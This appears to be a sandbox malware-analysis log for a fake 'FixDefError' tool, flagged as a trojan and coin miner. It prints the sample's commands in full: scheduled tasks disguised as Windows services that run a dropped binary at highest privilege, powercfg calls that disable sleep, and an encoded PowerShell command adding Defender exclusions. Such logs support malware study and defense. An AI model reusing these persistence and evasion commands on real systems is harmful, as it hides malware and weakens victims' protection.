      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: unknownProcess created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe C:\ProgramData\RuntimeBrokerData\RegSvc.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4AJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\FixDefError.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.logJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeJump to behavior
      Source: WinRing0x64.sys.1.drBinary string: \Device\WinRing0_1_2_0
      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
      Source: C:\Users\user\Desktop\FixDefError.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: FixDefError.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\FixDefError.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeMutant created: \Sessions\1\BaseNamedObjects\eliciting
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_01
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeMutant created: \Sessions\1\BaseNamedObjects\disconsolate
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2728:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
